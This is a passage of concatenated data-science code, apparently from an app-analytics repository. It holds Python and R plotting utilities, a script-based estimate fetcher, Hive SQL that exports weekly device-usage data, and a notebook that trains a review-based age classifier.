Plot multiclass ROC curve. Plots per-class and micro ROC curves.
:param df_true: pd.DataFrame or pd.Series with the true labels
(labels should be the same as the column names of df_score)
:param df_score: pd.DataFrame with scores
:return: matplotlib.pyplot.figure
Example:
$ df_true = pd.Series(['male', 'male', 'female', 'other', 'other'])
$ df_score = pd.DataFrame({
'male': [0.8, 0.7, 0.1, 0.2, 0.8],
'female': [0.1, 0.1, 0.7, 0.2, 0.1],
'other': [0.1, 0.2, 0.2, 0.6, 0.1],
})
$ fig = multiclass_roc_curve(df_true, df_score)
"""
classes = df_score.columns
fig = plt.figure(figsize=(7, 6))
ax = fig.gca()
roc_auc = OrderedDict()
for current_bin in classes:
fpr, tpr, _ = metrics.roc_curve(df_true == current_bin,
df_score[current_bin])
roc_auc[current_bin] = metrics.roc_auc_score(df_true == current_bin,
df_score[current_bin])
ax.plot(fpr, tpr, '--')
label_binarizer = preprocessing.LabelBinarizer()
label_binarizer.fit(classes)
all_labels = label_binarizer.transform(df_true).ravel()
if len(classes) > 2:
all_probas = df_score.values.ravel()
macro_roc = metrics.roc_auc_score(label_binarizer.transform(df_true), df_score)
else:
all_probas = df_score.iloc[:, 1].values
macro_roc = metrics.roc_auc_score(all_labels, all_probas)
micro_fpr, micro_tpr, _ = metrics.roc_curve(all_labels, all_probas)
ax.plot(micro_fpr, micro_tpr, 'k')
roc_auc['all (micro)'] = metrics.roc_auc_score(all_labels, all_probas)
ax.plot([0, 1], [0, 1], ':k')
# Format plot
legend = [k + ' ROC: ' + '{:1.2f}'.format(v) for
k, v in roc_auc.iteritems()] + ['Random']
ax.legend(legend, loc='lower right')
ax.axis('equal')
ax.set_xlim([-0.0, 1.01])
ax.set_ylim([-0.0, 1.01])
ax.set_xlabel('False Positive Rate (fall-out)')
ax.set_ylabel('True Positive Rate (sensitivity)')
ax.set_title(', '.join(classes) + '; macro ROC AUC = {:1.2f}'.format(macro_roc))
fig.tight_layout()
return fig
def save_figure(fig, title, fig_folder='fig/'):
"""
Save figure as png.
:param fig: matplotlib.pyplot.figure object
:param title: Title of plot (converted to name)
:param fig_folder: Folder to output to
:return None
"""
file_name = title.replace(' ', '_').lower() + '.png'
fig_path = os.sep.join((fig_folder, file_name))
fig.savefig(fig_path)
print('Saved to: ' + fig_path)
<file_sep>/product_quality/internal/est_fetcher.py
"""
Fetcher for estimation.
"""
# Author: <NAME> <<EMAIL>>
import sys
import subprocess
import itertools
from joblib import Parallel, delayed
import pandas as pd
import os.path
import utilities_date
import utilities_pandas
import stores_dict
def _run_fetch_script(script_path, store, feed, dt):
cmd = "python %s -s %s -f %s -d %s" % (script_path, store, feed, dt)
try:
print("Running the cmd: %s" % cmd)
child = subprocess.Popen(cmd.split(" "), stdout=subprocess.PIPE)
stdout_value, stderr_value = child.communicate()
ret = child.returncode
if ret is None or ret >= 2 or (stderr_value is not None and 'Error' in stderr_value):
raise Exception("Have problem fetching daily estimation: %s" % cmd)
df = utilities_pandas.convert_str_to_df(stdout_value)
return utilities_pandas.add_date_column(df, dt)
except Exception as e:
print(e)
sys.exit(2)
class ScriptEstFetcher(object):
"""Base class for all script based est fetcher.
"""
@classmethod
def fetch_to_dir(cls, save_dir, stores, units_types, daterange):
"""
Arguments:
- `save_dir`: the dir to save the results.
- `stores`: A list of stores to fetch.
- `units_types`: A list of unit_types to fetch.
- `daterange`: A 2-element list containing the start and the end date (inclusive).
"""
dtstart, dtend = daterange
feeds = itertools.chain(*[cls.unit_to_feeds[u] for u in units_types])
dts_daily = utilities_date.make_daily_daterange(dtstart, dtend)
for (store, feed) in itertools.product(stores, feeds):
dfs = Parallel(n_jobs=8)(delayed(_run_fetch_script)(cls.script_path, store, feed, dt)
for dt in dts_daily)
df = pd.concat(dfs)
csv_filename = os.path.join(save_dir, "%s_%s_%s--%s.csv" % (store, feed,
dts_daily[0],
dts_daily[-1]))
df = ScriptEstFetcher._add_meta_info(df, feed)
df.to_csv(csv_filename, index=False)
@staticmethod
def _add_meta_info(df, feed):
df['feed_id'] = feed
return df
class IosEstFetcher(ScriptEstFetcher):
"""Sorry for the sad name "Ios", but it's better to normalize things.
"""
unit_to_feeds = stores_dict.ios['unit_to_feeds']
script_path = 'external/est_ios.py'
class AndroidEstFetcher(ScriptEstFetcher):
unit_to_feeds = stores_dict.android['unit_to_feeds']
script_path = 'external/est_android.py'
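# Example usage (sketch; the store id, units type, and output dir are
# illustrative assumptions, not a verified configuration):
#   IosEstFetcher.fetch_to_dir('./out', stores=[143441],
#                              units_types=['Downloads'],
#                              daterange=['2013-01-01', '2013-01-31'])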
<file_sep>/old_investigations/internal/plot_common.R
library(ggplot2)
library(scales)
read_csv_and_metainfo_from_arg <- function() {
system('mkdir plots')
args <- commandArgs(TRUE)
file = args[1]
one_split <- strsplit(file, "\\.")[[1]][1]
final_split <- strsplit(one_split, "_")[[1]]
country <- final_split[2]
period <- final_split[3]
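  ## e.g. "sda/SDA_Japan_2012-08-01--2012-08-31_Aggregated.csv" yields
  ## country = "Japan" and period = "2012-08-01--2012-08-31"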
df = read.csv(file)
metainfo = list(country=country, period=period)
  list(df=df, metainfo=metainfo)
}
plot_dist <- function(stacked_df, metainfo) {
plot <- ggplot(stacked_df, aes(x=units_avg)) +
facet_grid(Unit ~ ., scales="free") +
geom_density(aes(colour=winner), alpha=0.3) +
ggtitle(paste(metainfo$country, metainfo$period)) +
xlab("Real Value")
}
plot_80_20 <- function(stacked_df, metainfo) {
plot <- ggplot(data=stacked_df, aes(x=differences, y=apps_percent)) +
facet_grid(unit ~ .) +
        geom_line(aes(colour=estimation, size=size)) +
scale_x_continuous(labels=percent, breaks=seq(0, 1, 0.1)) +
scale_y_continuous(labels=percent) +
scale_size(range=c(0.4, 1)) +
guides(size=FALSE) +
geom_text(aes(0.8, 0.1, label=paste("Apps num:", apps_num))) +
xlab("Relative Error") + ylab("% of top Apps") +
ggtitle(paste(metainfo$country, metainfo$period)) +
theme(panel.grid.major = element_line(size = 0.5, colour = '#1391FF'),
panel.grid.minor = element_blank())
}
plot_improvement <- function(df, metainfo, objestimate) {
## x - objestimate relerror; y - sdaimprovement
    p1 <- plot_y_sda_improvement_x_objestimate_relerror(df, metainfo, objestimate)
## x - objestimate improvement; y - sdarelerror
p2 <- plot_y_objestimate_improvement_x_sda_relerror(df, objestimate)
## x - real values; y - sdaimprovement
p3 <- plot_y_sda_improvement_x_realvalues(df)
## x - relative error threhold; y - percentage of SDA improvement
    p4 <- plot_y_sda_improvement_percent_x_relerror_diff_threshold(df, objestimate)
multiplot(p1, p2, p3, p4)
}
plot_y_sda_improvement_x_objestimate_relerror <- function(df, metainfo, objestimate) {
point_size <- 3
alpha_value <- 0.1
hline <- geom_hline(aes(yintercept=0), linetype="dashed")
all_opts <- opts(axis.text.x=theme_text(size=20),
axis.text.y=theme_text(size=20),
axis.title.x=theme_text(size=20),
axis.title.y=theme_text(size=20),
legend.title=theme_text(size=20),
plot.title=theme_text(size=32),
strip.text.x = element_text(size = 25))
if (objestimate == 'CBE') {
xval = "CBE.Relative.Error"
} else if (objestimate == 'Overall') {
xval = "Overall.Relative.Error"
} else if (objestimate == 'Games') {
xval = "Games.Relative.Error"
}
ggplot(data=df, aes_string(x=xval, y='SDA.Improvement')) +
facet_grid(. ~ Unit) + geom_point(alpha=alpha_value, size=point_size) +
ggtitle(paste(metainfo$country, metainfo$period, "\n", paste("SDA Improvement (relative error) for", objestimate))) +
hline + all_opts
## Add this if you want to zoom in ----> coord_cartesian(xlim=c(0, 1), ylim=c(-2, 2))
}
plot_y_objestimate_improvement_x_sda_relerror <- function(df, objestimate) {
point_size <- 3
alpha_value <- 0.1
hline <- geom_hline(aes(yintercept=0), linetype="dashed")
all_opts <- opts(axis.text.x=theme_text(size=20),
axis.text.y=theme_text(size=20),
axis.title.x=theme_text(size=20),
axis.title.y=theme_text(size=20),
legend.title=theme_text(size=20),
plot.title=theme_text(size=32),
strip.text.x = element_text(size = 25))
ggplot(data=df, aes(x=SDA.Relative.Error, y=-SDA.Improvement)) +
facet_grid(. ~ Unit) + geom_point(alpha=alpha_value, size=point_size) + ggtitle(paste(objestimate, "Improvement (relative error) for SDA.")) + hline + all_opts
## Add this if you want to zoom in ----> coord_cartesian(xlim=c(0, 1), ylim=c(-2, 2))
}
plot_y_sda_improvement_x_realvalues <- function(df) {
point_size <- 3
alpha_value <- 0.1
hline <- geom_hline(aes(yintercept=0), linetype="dashed")
all_opts <- opts(axis.text.x=theme_text(size=20),
axis.text.y=theme_text(size=20),
axis.title.x=theme_text(size=20),
axis.title.y=theme_text(size=20),
legend.title=theme_text(size=20),
plot.title=theme_text(size=32),
strip.text.x = element_text(size = 25))
    plot_x_realvalues_y_sdaimprovement <- ggplot(data=df, aes(x=log10(units_avg), y=SDA.Improvement)) +
        facet_grid(. ~ Unit) + geom_point(alpha=alpha_value, size=point_size) + xlab("Log10(Real Values)") +
        ggtitle("SDA Improvement in terms of real values.") + hline + all_opts
}
plot_y_sda_improvement_percent_x_relerror_diff_threshold <- function(df, objestimate) {
    ## Percentage of SDA improvement at different thresholds
all_opts <- opts(axis.text.x=theme_text(size=20),
axis.text.y=theme_text(size=20),
axis.title.x=theme_text(size=20),
axis.title.y=theme_text(size=20),
legend.title=theme_text(size=20),
plot.title=theme_text(size=32),
strip.text.x = element_text(size = 25))
if (objestimate == 'CBE') {
obj_relerror <- 'CBE.Relative.Error'
} else if (objestimate == 'Overall') {
obj_relerror <- "Overall.Relative.Error"
} else if (objestimate == 'Games') {
obj_relerror <- "Games.Relative.Error"
}
stacked_df = data.frame()
for (unit in c("Downloads", "USD")) {
current_df = subset(df, Unit==unit)
        threshold <- seq(0, 1, by=0.05)
        percent_and_samplenum <- sapply(threshold, function(x) {
win <- current_df$SDA.Relative.Error < current_df[[obj_relerror]]
apps <- (abs(current_df$SDA.Relative.Error - current_df[[obj_relerror]]) >= x)
sample_num <- sum(apps)
c(sum(win & apps) / sample_num, sample_num)
})
percent <- percent_and_samplenum[1,]
samplenum <- percent_and_samplenum[2,]
        percent_df <- data.frame(threshold, percent, samplenum, unit)
stacked_df <- rbind(stacked_df, percent_df)
}
    percent_plot <- ggplot(data=stacked_df, aes(x=threshold, y=percent)) +
        facet_grid(. ~ unit) +
        geom_line() +
        geom_text(aes(y=percent+0.1, label=samplenum), size=4) +
        geom_hline(aes(yintercept=0.5), linetype="dashed") +
        xlab("Difference of Relative Error >=") +
        ylab("Percentage of SDA Improvement") +
        ggtitle(paste("Percentage of SDA Improvement vs", objestimate, "\n(Labels are number of apps)")) +
        all_opts
}
## The following function (multiplot) is from
## http://wiki.stdout.org/rcookbook/Graphs/Multiple%20graphs%20on%20one%20page%20(ggplot2)/
##
# Multiple plot function
#
# ggplot objects can be passed in ..., or to plotlist (as a list of ggplot objects)
# - cols: Number of columns in layout
# - layout: A matrix specifying the layout. If present, 'cols' is ignored.
#
# If the layout is something like matrix(c(1,2,3,3), nrow=2, byrow=TRUE),
# then plot 1 will go in the upper left, 2 will go in the upper right, and
# 3 will go all the way across the bottom.
#
multiplot <- function(..., plotlist=NULL, file, cols=1, layout=NULL) {
require(grid)
# Make a list from the ... arguments and plotlist
plots <- c(list(...), plotlist)
numPlots = length(plots)
# If layout is NULL, then use 'cols' to determine layout
if (is.null(layout)) {
# Make the panel
# ncol: Number of columns of plots
# nrow: Number of rows needed, calculated from # of cols
layout <- matrix(seq(1, cols * ceiling(numPlots/cols)),
ncol = cols, nrow = ceiling(numPlots/cols))
}
if (numPlots==1) {
print(plots[[1]])
} else {
# Set up the page
grid.newpage()
pushViewport(viewport(layout = grid.layout(nrow(layout), ncol(layout))))
# Make each plot, in the correct location
for (i in 1:numPlots) {
# Get the i,j matrix positions of the regions that contain this subplot
matchidx <- as.data.frame(which(layout == i, arr.ind = TRUE))
print(plots[[i]], vp = viewport(layout.pos.row = matchidx$row,
layout.pos.col = matchidx$col))
}
}
}
<file_sep>/aa_au_model/correction/__init__.py
__author__ = 'hgriffioen'<file_sep>/product_quality/app_behavior.py
'''
Created on Apr 19, 2013
@author: perezrafael
'''
import pandas as pd
import numpy as np
import calendar
from internal import utilities
from internal import config
import statsmodels.api as sm
import matplotlib.pyplot as plt
def _get_top_apps_by_actuals(df, top):
    df = df.groupby('app_id').sum().reset_index()
    df = df.sort('units', ascending=False)  # rank apps by total units before slicing
    df = df[:top]
    df = df[['app_id']]
    return df
def _get_full_period_app_actuals (df):
size = df.groupby('app_id').size().reset_index()
max = size[0].max()
size = size[size[0]==max][['app_id']]
return size
def plot_autocorrelations(df, fig_title):
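    # For each app, compute the autocorrelation of its daily units series up to
    # lag 90, then boxplot the distribution of each lag's coefficient across apps.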
dir = './data/plots'
corr_array = []
df = df.groupby('app_id')
for name, group in df:
group = group.sort('date', ascending=True)
autocorrelation = sm.tsa.stattools.acf(group['units'].values, nlags=90)
for i in range(len(autocorrelation)):
if len(corr_array) == i:
corr_array.append([])
corr_array[i].append(autocorrelation[i])
plt.clf()
ax = plt.subplot(111)
ax.boxplot(corr_array)
ax.set_xticklabels(range(len(corr_array)))
#plt.grid(True, axis='x')
plt.xlabel('Lag')
plt.ylabel('Autocorrelation')
plt.title(fig_title)
plt.savefig('%s/%s.png'%(dir,fig_title))
#plt.show()
return corr_array
def main():
platforms = ['ios', 'android']
units = ['Downloads', 'USD']
top = 20
year = '2013'
months = ['01', '02', '03']
for platform in platforms:
if platform =='ios':
country_ids = [143441,143465,143466,143462,143444]
else:
country_ids =[10,7,9,27,3]
for country_id in country_ids:
if True:
            month = '03'
#for month in months:
for unit in units:
dtstart = '%s-%s-01'%(year, '01')
dtend = '%s-%s-%s'%(year, month, calendar.monthrange(int(year),int(month))[1])
df = utilities._fetch_from_db(platform, country_id, unit, dtstart, dtend)
if unit=='USD':
df.rename(columns={'revenue':'units'}, inplace=True)
if platform=='ios':
country_name = config.IOS_STORES_DICT[country_id]
elif platform=='android':
country_name = config.ANDROID_STORES_DICT[country_id]
df.rename(columns={'app_class':'app_id'}, inplace=True)
try:
full_period = _get_full_period_app_actuals(df)
full_period = full_period.merge(df, on='app_id', how='inner')
top20 = _get_top_apps_by_actuals(full_period, 20)
top20 = top20.merge(df, on='app_id', how='inner')
plot_title = 'autocorrelation_monthly_top20_%s_%s_%s_%s_%s'%(platform, country_name, unit, dtstart, dtend)
plot_autocorrelations(top20, plot_title)
#daily_top20 df.groupby('date')
except:
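                        # Data may be missing for some platform/country/unit
                        # combinations; ignore failures and continue.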
pass
if __name__ == '__main__':
main()<file_sep>/aa_au_model/hive_ql/export_active_devices.sql
drop table if exists active_devices_weekly_export;
create table active_devices_weekly_export (
end_period_date string,
device_id string
)
row format delimited fields terminated by '\t'
lines terminated by '\n'
stored as textfile
location 's3://aardvark-prod-pdx-ds-workspace/active-weekly'
;
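-- A device counts as weekly active only if it appears on all 7 days of the week.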
insert overwrite table active_devices_weekly_export
select
x.datestr as end_period_date,
x.device_id
from (
select
active.datestr,
active.device_id,
cast(count(distinct(active.date)) as int) as n_active
from
usage_model_selected_device_timezone_weekly active
group by
active.datestr,
active.device_id
having
cast(count(distinct(active.date)) as int) = 7
) x
;
drop table if exists active_devices_monthly_export;
create table active_devices_monthly_export (
end_period_date string,
device_id string
)
row format delimited fields terminated by '\t'
lines terminated by '\n'
stored as textfile
location 's3://aardvark-prod-pdx-ds-workspace/active-monthly'
;
insert overwrite table active_devices_monthly_export
select
x.datestr as end_period_date,
x.device_id
from (
select
active.datestr,
active.device_id,
cast(count(distinct(active.date)) as int) as n_active
from
usage_model_selected_device_timezone_monthly active
group by
active.datestr,
active.device_id
having
cast(count(distinct(active.date)) as int) = day(active.datestr)
) x
;
<file_sep>/user_profile/hive_ql/export_usage_personas.sql
set hive.auto.convert.join = true;
set hive.exec.dynamic.partition = true;
set start_date = '2015-05-01';
set end_date = '2015-05-31';
-- select weekly active devices
drop table if exists period_active_weekly;
create table period_active_weekly
as
select
x.datestr,
x.device_id
from (
select
active.datestr,
active.device_id,
cast(count(distinct(active.date)) as int) as n_active
from
usage_model_selected_device_timezone_weekly active
group by
active.datestr,
active.device_id
having
cast(count(distinct(active.date)) as int) = 7
) x
;
-- Get unique iOS devices
drop table if exists ios_devices_types;
create table ios_devices_types
as
select
device_id,
type
from
vpn_new_device_info
where
platform = 'iOS'
and type in ('Smartphone', 'Tablet')
group by
device_id,
type
;
-- select iphone and ipads active between start_date and end_date
drop table if exists useful_devices;
create table useful_devices
as
select
distinct active.device_id
from
period_active_weekly active
join ios_devices_types ios
on ios.device_id = active.device_id
where
datestr between ${hiveconf:start_date} and ${hiveconf:end_date}
;
-- get bundle ids and categories
-- get category per bundle_id
drop table if exists category;
create table category
as
select
distinct bundle_id,
app_category as category
from
vpn_sample_dpi_apps
;
-- select usage for useful devices between start date and end date
drop table if exists usage_active_devices;
create table usage_active_devices
as
select
x.device_id,
x.bundleid,
x.week_number,
count(x.session_duration) as num_sessions,
sum(x.session_duration) as total_session_duration,
percentile(cast(x.session_duration as BIGINT), 0.5) as median_session_duration
from (
select
usage.device_id,
weekofyear(usage.datestr) as week_number,
usage.bundleid,
(endtime-starttime)/1000 as session_duration
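            -- endtime/starttime appear to be epoch milliseconds; /1000 gives seconds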
from
vpn_sample_data_session usage
join useful_devices dev
on dev.device_id = usage.device_id
where
        usage.datestr between ${hiveconf:start_date} and ${hiveconf:end_date}
        -- sessions shorter than 1 second are discarded; HAVING without a
        -- GROUP BY is not valid, so this belongs in the WHERE clause
        and (endtime-starttime)/1000 >= 1
) x
group by
x.device_id,
x.bundleid,
x.week_number
;
-- Export daily data
drop table if exists usage_active_devices_export;
create table usage_active_devices_export (
device_id string,
bundleid string,
category string,
week_number int,
num_sessions int,
total_session_duration double,
median_session_duration double)
row format delimited fields terminated by '\t'
lines terminated by '\n'
stored as textfile
location 's3://aardvark-prod-pdx-ds-workspace/daily_data'
;
insert overwrite table usage_active_devices_export
select
device_id,
usage.bundleid,
category,
week_number,
num_sessions,
total_session_duration,
median_session_duration
from
usage_active_devices usage
join category categ
on categ.bundle_id = usage.bundleid
;
<file_sep>/aa_au_model/correction/plot.py
__author__ = 'hgriffioen'
import numpy as np
import pandas as pd
import sklearn.metrics
from matplotlib import pyplot as plt
from sklearn import learning_curve as lc
def roc(estimator, X, y_true, figsize=(6, 5), **kwargs):
"""
Plot ROC curve.
:param estimator: Estimator to plot ROC curve for
:param X: input data
:param y_true: true labels
:param figsize: Size of figure
:param kwargs: Keyword arguments for plt.figure()
:return: plt.figure(), plt.gca()
"""
# Generate ROC curve.
test_prob = estimator.predict_proba(X)
roc_auc = sklearn.metrics.roc_auc_score(y_true, test_prob[:, 1])
fpr, tpr, thresholds = sklearn.metrics.roc_curve(y_true, test_prob[:, 1])
    fig = plt.figure(figsize=figsize, **kwargs)
ax = fig.gca()
ax.plot(fpr, tpr)
# Get classifier point from confusion matrix.
conf_matrix = sklearn.metrics.confusion_matrix(y_true, estimator.predict(X))
fpr_optimum = conf_matrix[0, 1] * 1. / conf_matrix[0].sum()
tpr_optimum = conf_matrix[1, 1] * 1. / conf_matrix[1].sum()
ax.plot(fpr_optimum, tpr_optimum, 'or')
# Draw straight line (= random guessing).
ax.plot([0, 1], [0, 1], ':k')
# Format plot
ax.axis('equal')
ax.set_xlim([-0.0, 1.2])
ax.set_ylim([-0.0, 1.01])
ax.set_title('ROC AUC: %1.2f' % roc_auc)
ax.set_xlabel('False Positive Rate (fall-out)')
ax.set_ylabel('True Positive Rate (sensitivity)')
ax.legend(['ROC curve', 'Classifier', 'Random guessing'])
return fig, ax
def learning_curve(estimator, X, y, **kwargs):
"""
Plot learning curve.
:param estimator: Estimator to plot learning curve for
:param X: input data
:param y: labels
:param kwargs: Additional keyword arguments for sklearn.learning_curve.learning_curve
:return: plt.figure(), plt.gca()
"""
(train_sizes, train_scores,
test_scores) = lc.learning_curve(estimator, X, y, **kwargs)
train_scores_mean = np.mean(train_scores, axis=1)
train_scores_std = np.std(train_scores, axis=1)
test_scores_mean = np.mean(test_scores, axis=1)
test_scores_std = np.std(test_scores, axis=1)
fig = plt.figure()
ax = fig.gca()
ax.grid()
ax.fill_between(train_sizes, train_scores_mean - train_scores_std,
train_scores_mean + train_scores_std, alpha=0.1,
color="r")
ax.fill_between(train_sizes, test_scores_mean - test_scores_std,
test_scores_mean + test_scores_std, alpha=0.1, color="g")
ax.plot(train_sizes, train_scores_mean, 'o-', color="r", label="Training score")
ax.plot(train_sizes, test_scores_mean, 'o-', color="g", label="Cross-validation score")
ax.legend(loc="best")
ax.set_xlabel("# training examples")
ax.set_ylabel("AUC ROC Score")
return fig, ax
def grid_validation_curve(grid_search, param_1, param_2, scoring_name='roc_auc', **kwargs):
"""
Plot validation curve obtained by two parameter grid search.
:param grid_search: sklearn.grid_search.GridSearchCV object
:param param_1: first grid search parameter (put on x-axis)
:param param_2: second grid search parameter (plotted as separate lines)
    :param scoring_name: name of scoring function
:param kwargs: Additional keyword arguments for pd.DataFrame.plot
:return: plt.figure(), plt.gca()
"""
# Get parameter values and scores.
unpacked_results = [(s.parameters[param_1], s.parameters[param_2],
s.mean_validation_score) for s in grid_search.grid_scores_]
values_1, values_2, scores = zip(*unpacked_results)
results = pd.DataFrame({param_1: np.round(values_1, 2),
param_2: np.round(values_2, 2),
scoring_name: scores})
pivoted_df = results.pivot(index=param_1, columns=param_2, values=scoring_name)
fig = plt.figure()
ax = fig.gca()
pivoted_df.plot(title='Validation curve', figsize=(10, 6), ax=ax, **kwargs)
ax.set_xlabel('# features $ k $')
ax.set_ylabel('AUC ROC score')
return fig, ax
<file_sep>/datathon/visualizations/README.MD
# Usage Visualizations
<file_sep>/old_investigations/android/scaling.py
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib.ticker import AutoMinorLocator
# plot top 30 linear
# plot top 30 semi-logarithmic
# plot log-logarithmic (all)
# plot top 200 linear
#x = dict(grouped.mean()['units'])
df = pd.read_csv('dump.csv')
df = df[df['rank'] <= 25]
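# Normalize each day to a common market size: weight = K / (that day's top-25
# download total), so every day's scaled downloads sum to the same constant K.
# K itself is arbitrary; only the shape of the rank curve matters.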
K = 123456789
ws = K / df.groupby('day')['units'].sum()
x = pd.DataFrame(ws)
x = x.reset_index()
x.rename(columns={'units':'weight'}, inplace=True)
scaled = x.merge(df, on='day')
ax = plt.subplot(211)
plt.plot(df['rank'], df['units'], 'ro', alpha=0.4)
plt.plot(*zip(*df.groupby('rank')['units'].mean().iteritems()), color='black', lw=2.0, marker='s')
ax.xaxis.set_minor_locator(AutoMinorLocator())
plt.grid(True, which='both')
plt.xlabel('rank')
plt.ylabel('downloads (original)')
scaled['scaled'] = scaled['units'] * scaled['weight']
ax = plt.subplot(212)
plt.plot(scaled['rank'], scaled['scaled'], 'o', alpha=0.4)
plt.plot(*zip(*scaled.groupby('rank')['scaled'].mean().iteritems()), color='black', lw=2.0, marker='s')
ax.xaxis.set_minor_locator(AutoMinorLocator())
plt.grid(True, which='both')
plt.xlabel('rank')
plt.ylabel('downloads (scaled by daily weight)')
plt.savefig('scaling.png')
#plt.show()
<file_sep>/audience/legacy_experiments/vowpal_wabbit_age.py
# coding: utf-8
# In[20]:
import matplotlib.pyplot as plt
get_ipython().magic(u'matplotlib inline')
import os
from time import asctime, time
import subprocess
import csv
import numpy as np
import pandas as pd
from nltk.corpus import wordnet
from collections import defaultdict
from nltk.tokenize import wordpunct_tokenize
import nltk
from unidecode import unidecode
import random
import re
from nltk.corpus import stopwords
import collections
from nltk import FreqDist
from guess_language import guess_language
import itertools
import sklearn.linear_model as lm
from collections import Counter
import scipy as sp
from joblib import Parallel, delayed
import cPickle
import string
import psutil
from sklearn.ensemble import AdaBoostRegressor
from sklearn.ensemble import RandomForestRegressor
from sklearn.ensemble import RandomForestClassifier
# In[21]:
DATA_DIR = '/Users/perezrafael/appannie/data/demie'
TRAIN_FILE = 'age_train_full.csv'
TEST_FILE = 'ios_reviews_143441_201402.csv'
JOBS = 1
TRAIN_CLASSIFIER = False
MIN_REVIEWS_PER_NGRAM = 10
MODEL_NAME = 'age'
test_ids = [284882215, 447188370, 529479190, 553834731, 333903271, 284862083, 578463146, 538212549, 725008683]
# In[22]:
def guess_lang(x):
lang = 'UKNOWN'
try:
lang = guess_language(x.decode('utf-8'))
#lang = guess_language(x)
except:
pass
lang = str(lang)
return lang
def is_in_range(x, min, max):
if x >= min and x <= max:
return 1
return np.nan
def generate_vector(x, train_words):
return [(1 if tw in x else 0) for tw in train_words]
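# Build lowercased word n-grams (lengths MIN_N..MAX_N) from a review: keep only
# printable characters, strip digits/underscores, drop 1-character tokens,
# remove stop words from each n-gram, and return the unique n-grams.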
def features(x, ex_word, pattern, control, MIN_N, MAX_N):
x = x.lower()
x = ''.join([c for c in x if c in control])
x = pattern.sub(' ', x)
x = wordpunct_tokenize(x)
x = [w for w in x if len(w)>1]
n_tokens = len(x)
n_grams = []
for i in xrange(n_tokens):
for j in xrange(i+MIN_N, min(n_tokens, i+MAX_N)+1):
n = x[i:j]
n = [w for w in n if w not in ex_word]
n_grams.append(' '.join(n))
n_grams = list(set(n_grams))
return n_grams
def fit_clf(clf, a, b):
clf.fit(a, b)
return clf
def train_parallel(jobs, features, target):
features = np.array(features)
target = np.array(target)
index = range(len(target))
random.shuffle(index)
chunk_size = 5000
if jobs<2:
chunk_size = len(target)
print 'Training on full set'
chunks = [index[x:x+chunk_size] for x in xrange(0, len(index), chunk_size)]
def producer():
for chunk in chunks:
yield (features[chunk], target[chunk])
D = delayed(fit_clf)
a = [D(RandomForestClassifier(n_jobs=4), i[0], i[1])
for i
in producer()]
r = Parallel(n_jobs=jobs)(a)
clf = r[0]
#coefs = []
#for r1 in r:
# coefs.append(r1.coef_)
#clf.coef_ = np.mean(coefs, axis=0)
return clf
def apply_func(df_chunk, new_column, column, function, extra_params=None, save_to_csv=False):
if extra_params is None:
df_chunk[new_column] = df_chunk[column].apply(function)
else:
df_chunk[new_column] = df_chunk[column].apply(lambda x: function(x, *extra_params))
return df_chunk
def apply_parallel(df, jobs, new_column, column, function, extra_params=None, save_to_csv=False):
index = df.index.values
chunk_size = 5000
chunks = [index[x:x+chunk_size] for x in xrange(0, len(index), chunk_size)]
def producer():
for chunk in chunks:
yield (df.ix[chunk])
D = delayed(apply_func)
a = [D(i, new_column, column, function, extra_params, save_to_csv)
for i
in producer()]
r = Parallel(n_jobs=jobs, backend='threading')(a)
df = pd.concat(r)
return df
def predict_func(df, clf, features_column, target_column):
df[target_column] = clf.predict(list(df[features_column]))
return df
def predict_parallel(df, jobs, features_column, target_column, clf):
index = df.index.values
chunk_size = 5000
chunks = [index[x:x+chunk_size] for x in xrange(0, len(index), chunk_size)]
def producer():
for chunk in chunks:
yield (df.ix[chunk])
D = delayed(predict_func)
a = [D(i, clf, features_column, target_column)
for i
in producer()]
r = Parallel(n_jobs=jobs)(a)
df = pd.concat(r)
return df
# In[23]:
control = string.printable.replace('\t\n\r\x0b\x0c', '')
pattern = re.compile('[_\d]+')
sw = stopwords.words('english')
sw.extend(['ll', 've'])
sw = set(sw)
print control
# In[24]:
df_train = pd.read_csv('%s/%s'%(DATA_DIR, TRAIN_FILE), error_bad_lines=False)
df_train['age'] = df_train['age'].apply(lambda x: int(np.floor(x/10.0)))
df_train['age'][df_train['age']>6] = 6
# In[25]:
df_train.columns
# In[26]:
if TRAIN_CLASSIFIER:
#df_train = df_train[:20000]
#df_train['text'] = df_train.apply(lambda x: ' '.join([str(x['title']), str(x['text'])]), axis = 1)
#df_train['text'] = df_train['text'].apply(guess_language)
#df_train = apply_parallel(df_train, JOBS, 'lang', 'text', guess_lang)
print df_train.info()
#df_train = df_train[df_train['lang']=='en']
df_train = df_train.drop(['date', 'from_train', 'reviewer', 'byear'], axis=1)
df_train = apply_parallel(df_train, JOBS, 'text', 'text', features, [sw, pattern, control, 1, 3])
#df_train['text'] = df_train['text'].apply(lambda x: features(x, sw, pattern, control, 1, 2))
df_train.rename(columns={'text':'tokens'}, inplace=True)
df_train['token_count'] = df_train['tokens'].apply(len)
df_train = df_train[df_train['token_count']>3]
print df_train.info()
train_words = list(itertools.chain(*df_train['tokens']))
train_words = list(set([value for value, count in Counter(train_words).items() if count >= MIN_REVIEWS_PER_NGRAM]))
if '' in train_words: train_words.remove('')
print len(train_words)
# save train words
with open('%s/%s_train_words.pkl'%(DATA_DIR, MODEL_NAME), 'wb') as fid:
cPickle.dump(train_words, fid)
#df_train = apply_parallel(df_train, JOBS, 'vectors', 'tokens', generate_vector, [train_words])
#df_train['vectors'] = df_train['tokens'].apply(lambda x: generate_vector(x, train_words))
#del df_train['tokens']
#clf = train_parallel(JOBS, train_matrix, df_train['AGE'].values)
#clf.fit(list(df_train['vectors']), df_train['age'])
index = df_train.index.values
random.shuffle(index)
chunk_size = 50000
chunks = [index[x:x+chunk_size] for x in xrange(0, len(index), chunk_size)]
clfs = []
for chunk in chunks:
df_chunk = df_train.ix[chunk].copy()
#df_chunk = apply_parallel(df_chunk, JOBS, 'vectors', 'tokens', generate_vector, [train_words])
df_chunk['vectors'] = df_chunk['tokens'].apply(lambda x: generate_vector(x, train_words))
clf = RandomForestClassifier(n_estimators=4, n_jobs=4)
clf.fit(list(df_chunk['vectors']), df_chunk['age'])
clfs.append(clf)
del df_chunk
print clf
del df_train['tokens']
clf = clfs[0]
estimators=[]
for c in clfs:
estimators.extend(c.estimators_)
clf.estimators_ = estimators
clf.n_estimators = len(estimators)
with open('%s/%s_classifier.pkl'%(DATA_DIR, MODEL_NAME), 'wb') as fid:
cPickle.dump(clf, fid)
#print 'score: ', clf.score(list(df_train['vectors']), df_train['age'])
else:
# load train words
with open('%s/%s_train_words.pkl'%(DATA_DIR, MODEL_NAME), 'rb') as fid:
train_words = cPickle.load(fid)
    # load classifier
